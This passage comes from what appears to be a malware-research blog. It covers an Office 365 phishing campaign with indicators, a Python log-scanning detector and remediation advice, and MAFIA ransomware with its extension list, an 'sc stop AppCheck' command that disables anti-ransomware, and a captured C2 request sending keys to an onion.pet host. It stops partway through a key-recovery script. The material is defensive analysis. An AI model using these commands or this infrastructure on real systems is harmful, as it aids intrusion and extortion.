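    print(parse_log_filename("RunCmd2019-03-17 21-00-37.log"))
    for r in suspicious_runs(SAMPLE_LOG):
        print(r)
```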
<br />
Why try using LOLBins when you can use tools installed by the manufacturer?<br />
<br />
<br />
<b>Resources</b><br />
<br />
Github - <a href="https://lolbas-project.github.io/" target="_blank">Living Off The Land Binaries and Scripts (and also Libraries)</a><br />
Hexacorn - <a href="http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/" target="_blank">Reusigned Binaries – Living off the signed land</a><br />
<br />
<br />
Bart (http://www.blogger.com/profile/18326761248866196755)<br />
<br />
<b style="font-size: x-large;">Analysing a massive Office 365 phishing campaign</b><br />
Published 2019-03-04T20:57:00+01:00, updated 2019-05-24T19:28:09+02:00<br />
Last week, a friend of mine reached out with a query: a contact in his address book had sent him a suspicious email. As it turns out, it was. In this blog post, we'll have a quick look at an Office 365 phishing campaign, which turned out to be massive. This type of phishing has been on the rise for a while now (at least since 2017), and it's important to point out, as such attacks only seem to be increasing.<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
As mentioned earlier, Office 365 (O365) phishing isn't new, but it is definitely prevalent. A high-level overview of a typical attack is as follows:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-I35Z45xSjZQ/XH1ajQ4plYI/AAAAAAAACJ8/_XlxaGjk0ZcuWc_sPH4nA2FeCOi4L4U6wCLcBGAs/s1600/dia.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="350" data-original-width="450" height="248" src="https://3.bp.blogspot.com/-I35Z45xSjZQ/XH1ajQ4plYI/AAAAAAAACJ8/_XlxaGjk0ZcuWc_sPH4nA2FeCOi4L4U6wCLcBGAs/s320/dia.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - High-level overview of typical O365 phishing</td></tr>
</tbody></table>
A typical flow of such an attack may be as follows:<br />
<br />
<br />
<ol>
<li>An attacker sends an O365 spearphishing email, likely from a spoofed or fake email address;</li>
<li>The user is enticed to click on the link, or open the attachment which includes a link;</li>
<li>The user will then unknowingly enter their credentials on the fake O365 page;</li>
<li>Credentials get sent back to the attacker;</li>
<li>Attacker will access the now compromised user's mailbox; and,</li>
<li>The cycle repeats: the attacker will send spearphish emails to all of the compromised user's contacts, with one difference: this time it comes from a legitimate sender.</li>
</ol>
<div>
This is exactly what happened to a friend of mine: he got sent an email from a legitimate email address, which was a contact in his address book - only the sender never intentionally sent this email! </div>
<div>
<br /></div>
<div>
Let's have a look at the infection chain.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">The initial email</span></b></div>
<div>
<br /></div>
<div>
The initial email sent looked as follows:</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://3.bp.blogspot.com/-SJVzuDuxRzk/XH1dACCNrWI/AAAAAAAACKI/oYR19UHNO0IUqO5LQFpfb-VtvlVT8H-oQCLcBGAs/s1600/Email.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="614" data-original-width="1588" height="153" src="https://3.bp.blogspot.com/-SJVzuDuxRzk/XH1dACCNrWI/AAAAAAAACKI/oYR19UHNO0IUqO5LQFpfb-VtvlVT8H-oQCLcBGAs/s400/Email.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - "P.AYMENT COPY"</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
Clicking on the "OPEN" button would redirect you to a legitimate but compromised Sharepoint (part of O365) webpage. Seeing as a legitimate business has been compromised, I won't post the link here. Its web administrators have been notified.<br />
<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-l3Wi3oUg20A/XH1mqZleQPI/AAAAAAAACKU/Wl7iFzu2BI0eFtS1jhNsCOJRco8XJPFFACLcBGAs/s1600/pdf.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="896" data-original-width="1600" height="179" src="https://1.bp.blogspot.com/-l3Wi3oUg20A/XH1mqZleQPI/AAAAAAAACKU/Wl7iFzu2BI0eFtS1jhNsCOJRco8XJPFFACLcBGAs/s320/pdf.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - "Access OneDrive"</td></tr>
</tbody></table>
<b><span style="font-size: large;">The PDF document</span></b><br />
<br />
The next step hosts a PDF named "INVOICE.PDF", which entices the user to access OneDrive to view the shared file. If the user were to click on "OPEN PDF HERE":<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://4.bp.blogspot.com/-iSPQ4xCvS40/XH1nxS8PJ7I/AAAAAAAACKg/eydmdxc55MUko-QkWIz-NgVagraCBBYCQCLcBGAs/s1600/capt2.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1108" data-original-width="1477" height="240" src="https://4.bp.blogspot.com/-iSPQ4xCvS40/XH1nxS8PJ7I/AAAAAAAACKg/eydmdxc55MUko-QkWIz-NgVagraCBBYCQCLcBGAs/s320/capt2.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - "Login with Office 365"</td></tr>
</tbody></table>
URI: <i>https://happymachineit[.]info/Michael/b4fb042ba2b3b35053943467ac22a370/OFE1.htm</i><br />
<br />
<b><span style="font-size: large;">The final landing or phishing page</span></b><br />
<br />
<br />
Finally, clicking on "Login with Office 365" will redirect the user to the final phishing page, which will look as follows:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-JYqFHo2IHpo/XH1olwcw4zI/AAAAAAAACKw/u2ligTIm69c48PXoGYLxQYIfp_FluFg7QCLcBGAs/s1600/Final.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="818" data-original-width="1024" height="255" src="https://2.bp.blogspot.com/-JYqFHo2IHpo/XH1olwcw4zI/AAAAAAAACKw/u2ligTIm69c48PXoGYLxQYIfp_FluFg7QCLcBGAs/s320/Final.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - Final landing page</td></tr>
</tbody></table>
The final landing page is as follows:<br />
<i>https://happymachineit[.]info/Michael/b4fb042ba2b3b35053943467ac22a370/7hsfabvj2b0b9rguzbzw910d.php</i><br />
<br />
When entering credentials, they will be sent off to the attacker, and the cycle from Figure 1 will repeat itself. Note that other scenarios are possible, for example:<br />
<ol>
<li>The attacker may try to (re-)sell credentials that have been gathered so far on criminal forums</li>
<li>The attacker may send more targeted spearphishes to potentially interesting victims</li>
<li>The attacker may attempt to access other services or accounts using the same user/password combination</li>
</ol>
<div>
In short, there's countless other possibilities.</div>
<div>
<br /></div>
<div>
<b><span style="font-size: large;">The phishing infrastructure</span></b></div>
<div>
<br /></div>
<div>
Attentive readers will have noticed the phishing website uses a valid SSL certificate, which has the following details:</div>
<br />
<br />
<ul>
<li>Subject DN: <i>CN=happymachineit.info</i></li>
<li>Issuer DN: <i>C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority</i></li>
<li>Serial: <i>169382499542171049850152621295591104087</i></li>
</ul>
The SSL cert was issued by Comodo in January. Details can be found on <a href="https://censys.io/certificates/c2fb6841afd7cff441d2dedfab40c84a5c1ba5bf005c3721a398cf92660ed448">Censys.io</a>.<br />
<br />
An additional email address is connected with "happymachine": <i>fudtoolshop@gmail.com</i><br />
<br />
The phishing website encountered here, <i>https://happymachineit[.]info</i>, is hosted on the following IP: <i>178.159.36[.]107</i><br />
<br />
Pivoting on that IP brings us to the following SSL certificate details:<br />
<br />
<i>emailAddress=ssl@server.localhost.com, CN=server.localhost.com</i><br />
<br />
This means the certificate is a local and self-signed one. In other words, if you are accessing a secure website and you see "<i>server.localhost.com</i>" as the SSL certificate, do NOT trust it. This is sometimes the result of an automatic setup by the hosting provider.<br />
<br />
As a side-note, a search for the Common Name (CN) mentioned above with Censys currently yields 473 (unexpired certs) results: <a href="https://censys.io/certificates?q=server.localhost.com" target="_blank">https://censys.io/certificates?q=%28server.localhost.com%29+AND+tags.raw%3A+%22unexpired%22&</a><br />
<br />
Performing a <a href="https://community.riskiq.com/search/178.159.36.107" target="_blank">search</a> with RiskIQ's PassiveTotal as well as <a href="https://www.virustotal.com/en/ip-address/178.159.36.107/information/" target="_blank">VirusTotal</a>, and after filtering results, we obtain a whopping total of <b><u>875</u></b> <u><b>unique</b> </u>Office 365 phishing sites, hosted on that IP alone! It appears this campaign has been active since December 2018.<br />
<br />
Searching a bit further, it appears the whole ASN (which is a collection of IP prefixes controlled by a single entity, typically an ISP), <a href="https://urlscan.io/asn/AS48666" target="_blank">AS48666</a> is in fact riddled with Office 365 as well as other phishing sites. Using <a href="https://urlscan.io/" target="_blank">URLscan.io</a> we can quickly gauge the ASN is hosting multiple phishing sites for Office 365 as well as Adobe:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-w9RtiI_UMCo/XH1000UM4vI/AAAAAAAACK8/lajhksY675wX15NpUCGYTkqQ40OjrtHcgCLcBGAs/s1600/ASN.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="521" data-original-width="1116" height="149" src="https://2.bp.blogspot.com/-w9RtiI_UMCo/XH1000UM4vI/AAAAAAAACK8/lajhksY675wX15NpUCGYTkqQ40OjrtHcgCLcBGAs/s320/ASN.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 6 - AS48666 hosting badness</td></tr>
</tbody></table>
<u>General Info:</u><br />
<br />
<ul>
<li>Geo: Russian Federation (RU)</li>
<li>AS: AS48666 - AS-MAROSNET Moscow, Russia, RU </li>
<li>Registrar: RIPENCC</li>
</ul>
<br />
As shown in this blog post, one IP address can host tons of phishing instances, while the ASN controls multiple IPs. Bonus bad IP: <i>178.159.36[.]120. </i><br />
<br />
<br />
<span style="font-size: large;"><b>Detection</b></span><br />
<br />
For the phishing websites themselves: look for any network traffic to, or DNS resolutions for, the IP address above.<br />
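Added example (not from the post): Python that refangs the indicators given in this post, including the 178.159.36[.]0/24 range from the Prevention section, and runs them over constructed proxy log lines, matching both the hostname in the URL and the destination IP so that sites on the same IP block are caught even when their domain is not yet known.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicators as written (defanged) in this post; refang() restores the real form.
INDICATOR_HOSTS = ["happymachineit[.]info"]
INDICATOR_IPS = ["178.159.36[.]107", "178.159.36[.]120"]
INDICATOR_NETS = ["178.159.36[.]0/24"]


def refang(value):
    """Turn a defanged indicator ("[.]", "hxxp") back into its usable form."""
    return (value.replace("[.]", ".")
                 .replace("hxxps://", "https://")
                 .replace("hxxp://", "http://"))


HOSTS = {refang(h).lower() for h in INDICATOR_HOSTS}
IPS = {ipaddress.ip_address(refang(i)) for i in INDICATOR_IPS}
NETS = [ipaddress.ip_network(refang(n)) for n in INDICATOR_NETS]

# Constructed sample proxy log (not real traffic), one record per line:
# timestamp, client, method, URL, destination IP. Clients are RFC 1918 addresses and
# the non-phishing destinations use RFC 5737 documentation ranges.
SAMPLE_LOG = """\
2019-03-01T10:15:02Z 10.0.0.15 GET https://happymachineit.info/Michael/b4fb042ba2b3b35053943467ac22a370/OFE1.htm 178.159.36.107
2019-03-01T10:15:40Z 10.0.0.15 POST https://happymachineit.info/Michael/b4fb042ba2b3b35053943467ac22a370/7hsfabvj2b0b9rguzbzw910d.php 178.159.36.107
2019-03-01T10:16:10Z 10.0.0.22 GET https://outlook.office365.com/owa 203.0.113.10
2019-03-01T10:17:00Z 10.0.0.31 GET https://unknown-site.example/office/index.php 178.159.36.120
2019-03-01T10:18:00Z 10.0.0.22 GET https://www.example.com/ 198.51.100.7
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<dst>\S+)$"
)


def host_matches(host):
    """True for the indicator domain itself or any subdomain of it."""
    host = host.lower().rstrip(".")
    return any(host == h or host.endswith("." + h) for h in HOSTS)


def ip_matches(ip_str):
    """True for a listed IP or any address inside a listed prefix."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False
    return ip in IPS or any(ip in net for net in NETS)


def scan_log(text):
    """Return the log records that touch the phishing infrastructure, with the reason(s)."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host = urlparse(m["url"]).hostname or ""
        reasons = []
        if host_matches(host):
            reasons.append("host:" + host)
        if ip_matches(m["dst"]):
            reasons.append("ip:" + m["dst"])
        if reasons:
            hits.append({"ts": m["ts"], "client": m["client"],
                         "url": m["url"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["client"], hit["reasons"])
```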
<br />
I've noticed there are countless similar PDFs from this same campaign. Due to the way these are created (likely in bulk), a simple Yara rule can be developed as follows:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLYcek19GEL5L_FT0zeg63JVU57PocUJ7DHl3AIphGEytF3w_8QopMJJD8ZpkzERWs_XZb9QZyTrkhLM6KVqXtq9ApnN04_MvIVbThBdjZnmj-SHXqd7kk6ykdcr9RIY_7Lwm6v97egFfV/s1600/yararule.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="261" data-original-width="745" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLYcek19GEL5L_FT0zeg63JVU57PocUJ7DHl3AIphGEytF3w_8QopMJJD8ZpkzERWs_XZb9QZyTrkhLM6KVqXtq9ApnN04_MvIVbThBdjZnmj-SHXqd7kk6ykdcr9RIY_7Lwm6v97egFfV/s400/yararule.PNG" width="400" /></a></div>
The Yara rule can be found on Pastebin <a href="https://pastebin.com/cF9HMmHR" target="_blank">here</a> or on Github Gist <a href="https://gist.github.com/bartblaze/6814bdcf503f8b1a9c06a178423c9b74" target="_blank">here</a>.<br />
<div>
<br /></div>
Note: in specific instances, this rule may false-positive - so use at your own will.<br />
<br />
The following MITRE ATT&CK techniques are relevant:<br />
<br />
<ul>
<li><a href="https://attack.mitre.org/techniques/T1192/" target="_blank">T1192 - Spearphishing Link</a></li>
<li><a href="https://attack.mitre.org/techniques/T1193/" target="_blank">T1193 - Spearphishing Attachment</a></li>
<li><a href="https://attack.mitre.org/techniques/T1078/" target="_blank">T1078 - Valid Accounts</a></li>
</ul>
<br />
<br />
<b><span style="font-size: large;">Disinfection</span></b><br />
<br />
There isn't much to disinfect, since there's no actual malware involved.<br />
<br />
However, if you have been affected by this phishing campaign, do the following immediately:<br />
<br />
<ul>
<li>Contact your network and/or system administrator or managed services provider if you have one and wait for their response - if not;</li>
<li>Note down the phishing page/URL, then close any open phishing pages - in fact, close the whole browser;</li>
<li>Perform an antivirus scan with your installed product, and a scan with another application, for example Malwarebytes (better be safe than sorry);</li>
<li>Change your O365 password immediately;</li>
<li>Change passwords on other websites where you used the same combination;</li>
<li>Reach out to the people in your address book: tell them you were compromised and that they should not open your email(s), or at least not any attachments or links in them;</li>
<li>Verify your "Sent" emails folder (or "Outbox") for any suspicious activity. If there are no Sent emails, the attacker may have deleted them, or you may have a full compromise on your hands;</li>
<li>Verify any (newly) created rules in your mail application (in this case O365), for example, verify there are no new forwarding rules or perhaps rules that delete new incoming emails - forwarding rules and deletion rules are sometimes set up by an attacker to gather more information or as an attempt to remain hidden; and,</li>
<li>File a complaint with your CERT, local police station, or whichever authority would handle such cases. If you are unsure how to do so, have a look <a href="https://bartblaze.blogspot.com/2016/11/cybercrime-report-template.html" target="_blank">here</a> for assistance.</li>
</ul>
<br />
<br />
<b><span style="font-size: large;">Prevention</span></b><br />
<br />
<ul>
<li>Block the IP (or whole subnet <i>178.159.36[.]0/24) </i>mentioned in this report in your firewall or proxy or other appliance;</li>
<li>Use strong and preferably unique passwords (use a password manager);</li>
<li>Set up 2FA for accounts or, preferably, MFA (multi-factor authentication);</li>
<li>Enable, deploy or implement anti-spam and anti-phishing protection;</li>
<li>Enable, deploy, or implement a URL phishing filter;</li>
<li>Trust, but verify: "Did this contact really need to send me a 'Payment Copy'?" If needed, verify via a phone call, <b>not</b> via email;</li>
<li>Be generally cautious with links and attachments. Do not click on links or open attachments from unknown senders; </li>
<li>If possible, use Firefox with <a href="https://noscript.net/" target="_blank">NoScript</a> enabled; and,</li>
<li>If you're in an organisation: create or organise user awareness training.</li>
</ul>
<br />
<b style="font-size: x-large;">Conclusion</b><br />
<span style="font-size: large;"><b><br /></b></span>
Phishing has been around for a long time - Office 365 phishing, on the other hand, has been around since, well, Office 365 was created. Every time a new service is created, you can imagine that phishing emails targeting that service will follow - maybe one month later, perhaps a year later - but they will.<br />
<br />
Always try to be vigilant and follow the prevention tips mentioned above to stay safe.<br />
<br />
As a side-note, the <u>real</u> Office 365 page is: <a href="https://outlook.office365.com/owa" target="_blank">https://outlook.office365.com/owa</a><br />
<br />
You may find more information in the <b>Resources</b> section below.<br />
<br />
<b>Resources</b><br />
<br />
Blaze's Security Blog - <a href="https://bartblaze.blogspot.com/2016/11/cybercrime-report-template.html" target="_blank">Cybercrime Report Template</a><br />
Decent Security - <a href="https://decentsecurity.com/#/malware-web-and-phishing-investigation/" target="_blank">Easily Report Phishing and Malware</a><br />
Microsoft - <a href="https://docs.microsoft.com/en-us/office365/securitycompliance/anti-phishing-protection" target="_blank">Anti-phishing protection in Office 365</a><br />
Microsoft - <a href="https://news.microsoft.com/en-gb/2019/01/07/government-backs-office-365-cloud-move-after-microsoft-guidance/" target="_blank">Microsoft publishes guidance to boost public sector cloud security</a><br />
Microsoft - <a href="https://docs.microsoft.com/en-us/office365/admin/security-and-compliance/set-up-multi-factor-authentication?view=o365-worldwide" target="_blank">Set up multi-factor authentication</a><br />
Microsoft - <a href="https://docs.microsoft.com/en-us/office365/securitycompliance/set-up-anti-phishing-policies" target="_blank">Set up Office 365 ATP anti-phishing and anti-phishing policies</a><br />
<br />
<b>Indicators</b><br />
<b><br /></b>
<script src="https://otx.alienvault.com/pulse/5c7d848707dffd1d86f2d179.js"></script>
<b><br /></b>
Bart (http://www.blogger.com/profile/18326761248866196755)<br />
<br />
<b style="font-size: x-large;">MAFIA ransomware targeting users in Korea</b><br />
Published 2018-08-12T17:31:00+02:00, updated 2018-08-18T23:15:22+02:00<br />
A new ransomware family was discovered and sent to me by <a href="https://twitter.com/malwrhunterteam" target="_blank">MalwareHunterTeam</a>, which we'll call MAFIA due to the extension it uses to encrypt files. The ransomware appears to target users in Korea, and may have been developed with at least knowledge of the Korean language.<br />
<br />
Another interesting (and new to me) feature is the use of "Onion.Pet", a Tor proxy as a means for C2 (network) communication. Read the analysis below to find out more details on this ransomware. (not to be confused with <a href="https://twitter.com/BleepinComputer/status/817069320937345024" target="_blank">MafiaWare</a>, a Hidden Tear variant - the MAFIA ransomware described here is unique).<br />
<br />
<br />
<b><span style="font-size: large;">Analysis</span></b><br />
<br />
It's currently unknown how the MAFIA ransomware reaches a system, but it's likely delivered via spear-phishing rather than installed manually. The binary analysed here has the following properties:<br />
<ul>
<li><b>MD5</b>: da23c8a7be5d83ae3e6b7b3291fdb880</li>
<li><b>SHA1</b>: 419a00476e229f4b2fc85ffd54ed1e32b03c069d</li>
<li><b>SHA256</b>: d6dee35981698416804548185f09af9c27987a0423e35bffd5b543c50fb9b5e3</li>
<li><b>Compilation timestamp</b>: 2018-08-02 15:11:23</li>
<li><b>VirusTotal report</b>:<br /><a href="https://www.virustotal.com/en/file/d6dee35981698416804548185f09af9c27987a0423e35bffd5b543c50fb9b5e3/analysis/" target="_blank">d6dee35981698416804548185f09af9c27987a0423e35bffd5b543c50fb9b5e3</a></li>
</ul>
<div>
First, MAFIA will attempt to stop a service named "AppCheck" by launching the following command (which will use an elevated CMD prompt):</div>
<div>
<br /></div>
<blockquote class="tr_bq">
<i>sc stop AppCheck</i></blockquote>
<br />
Ransomware usually stops database services so that it can also encrypt database files that would otherwise be locked by those processes. In this case, however, <i>AppCheck</i> is a service belonging to an anti-ransomware product from South Korea; Figure 1 shows a screenshot of its website.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://2.bp.blogspot.com/-AiWE1g5TiA0/W3BIBmONyDI/AAAAAAAACGg/7Dq_OnbwRocXx65IWAzRPzgBt0dofbzrwCLcBGAs/s1600/appcheck.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="447" data-original-width="1039" height="171" src="https://2.bp.blogspot.com/-AiWE1g5TiA0/W3BIBmONyDI/AAAAAAAACGg/7Dq_OnbwRocXx65IWAzRPzgBt0dofbzrwCLcBGAs/s400/appcheck.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - "100% Signatureless Anti-Ransomware" - <a href="https://www.checkmal.com/?lang=en">https://www.checkmal.com/?lang=en</a></td></tr>
</tbody></table>
<br />
As for the effectiveness of this software: no idea, but the author deemed it important enough to target it specifically, so either it has proven effective against ransomware, or it is widely used by users and businesses.<br />
<br />
The author of the MAFIA ransomware has also left a debug path, which mentions the name "Jinwoo" (<span style="font-family: inherit;">"진우" </span>in Korean), and may be an indicator of the developer's nationality.<br />
<br />
MAFIA makes use of OpenSSL to encrypt files, which it does with AES-256 in CBC mode. As mentioned earlier, encrypted files receive the ".MAFIA" extension; for example, Penguins.jpg becomes <b>Penguins.jpg.MAFIA</b>.<br />
<br />
Files with the following extensions (300 in total) will be encrypted:<br />
<br />
<blockquote class="tr_bq">
<i>.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ait, .apj, .arw, .asf, .asm, .asp, .asx, .avi, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkp, .bkp, .blend, .bpw, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .cpi, .cpp, .cr2, .craw, .crt, .crw, .csh, .csl, .csv, .dac, .db-journal, .db3, .dbf, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fhd, .fla, .flac, .flv, .fpx, .fxg, .gray, .grey, .gry, .hbk, .hpp, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .java, .jpe, .jpeg, .jpg, .kc2, .kdbx, .kdc, .key, .kpdx, .lua, .m4v, .max, .mdb, .mdc, .mdf, .mef, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpg, .mrw, .msg, .myd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nx1, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .plc, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .psafe3, .psd, .pspimage, .pst, .ptx, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rtf, .rw2, .rw1, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, .sqlite, .sqlite3, .sqlitedb, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .stc, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tlg, .txt, .vob, .wallet, .wav, .wb2, .wmv, .wpd, .wps, .xll, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .ycbcra, .yuv, .zip, .alz, .jar, .png, .bmp, .a00, .gif, .egg</i></blockquote>
<br />
Note: because the MAFIA ransomware uses OpenSSL for encryption, the process is slow, and the user may be able to interrupt it by killing the process (typically named <i>winlog<b>i</b>n.exe</i>, note the "i": a lookalike of the legitimate <i>winlogon.exe</i>) or by shutting down the machine.<br />
<br />
Figure 2 shows a side-by-side visual representation of the original (left) and encrypted image (right).<br />
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-l6R572aL6zQ/W3BKe-hW6BI/AAAAAAAACGs/rnVUNZFOobMlsnZFvncvVRSGgXZc0tmlQCLcBGAs/s1600/viz.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="1600" data-original-width="992" height="400" src="https://1.bp.blogspot.com/-l6R572aL6zQ/W3BKe-hW6BI/AAAAAAAACGs/rnVUNZFOobMlsnZFvncvVRSGgXZc0tmlQCLcBGAs/s400/viz.png" width="247" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Comparison (the blue represents ASCII strings)</td></tr>
</tbody></table>
<br />
MAFIA will also create an HTML ransom note named "Information" in the same location as the original dropper. Ironically enough, the ransom note also gets the ".mafia" extension appended; the file itself is not encrypted, however.<br />
<br />
Figure 3 shows the ransom note, in a browser.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN64LAgVnHWRQ-K30EPfSTKjjFkCtfU1PzqLZW_ktwzXyuoCQC0yzJF_2MinUv-eb-aqz6A36dvBJXjINXE9ryKjGmAPcegAMX7kMJ68cLYBJOZq1iw1Yy0T2dKQySjN48Z0V0GU61jVoH/s1600/note.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="256" data-original-width="768" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjN64LAgVnHWRQ-K30EPfSTKjjFkCtfU1PzqLZW_ktwzXyuoCQC0yzJF_2MinUv-eb-aqz6A36dvBJXjINXE9ryKjGmAPcegAMX7kMJ68cLYBJOZq1iw1Yy0T2dKQySjN48Z0V0GU61jVoH/s400/note.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Ransom note</td></tr>
</tbody></table>
<br />
The text translates from Korean ("고유넘버") as "Unique number", and appears to contain two unique identifiers.<br />
<br />
As mentioned earlier, MAFIA will use a Tor proxy for C2 communication; an example request is as follows:<br />
<br />
<blockquote class="tr_bq">
<i>GET /mafiaEgnima.php?iv=0x9e0x4b0x410x5c0x480x3a0xf40x90x2f0xfa0x960xb90x9b0x830xd40xb7&key=0xb90x1e0x600x3d0xef0x6c0xe60x930x6d0xab0x420x7b0x50x350xf00xcd0x3c0x490xc30x5f0xa10xe0xda0x270x5d0xd50xd10xa40xc0x9f0x340x79&seq=cbdf395c9281ae2ec52a306b5c29ec5 HTTP/1.1<br />Host: wibkilmskir4rlxz.onion.pet<br />Connection: keep-alive<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36</i></blockquote>
<br />
It appears the ransomware sends the encryption key and IV to the C2 in the query string of an HTTP GET request. Anyone inspecting the network traffic at that point (a proxy log or a packet capture) could therefore recover them and decrypt the files.<br />
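As an added example (not code from the original post), the following Python parses a captured check-in request of the kind quoted above and recovers the key and IV from the query string. The byte encoding (each byte written as "0x" plus unpadded hex, concatenated without separators) is inferred from that single request; the sample request is constructed from the one shown above, and the Tor2web gateway suffixes are the two domains mentioned in this post. The function names are my own.<br />

```python
"""Recover the AES key and IV that MAFIA leaks in its C2 check-in.

Added example, not from the original post. Parses a captured HTTP request
of the shape quoted in the analysis and flags it as a MAFIA check-in.
"""
from urllib.parse import urlsplit, parse_qs

# Constructed sample: the request line and headers quoted in the post, as a
# defender would see them in a proxy log or packet capture.
SAMPLE_REQUEST = (
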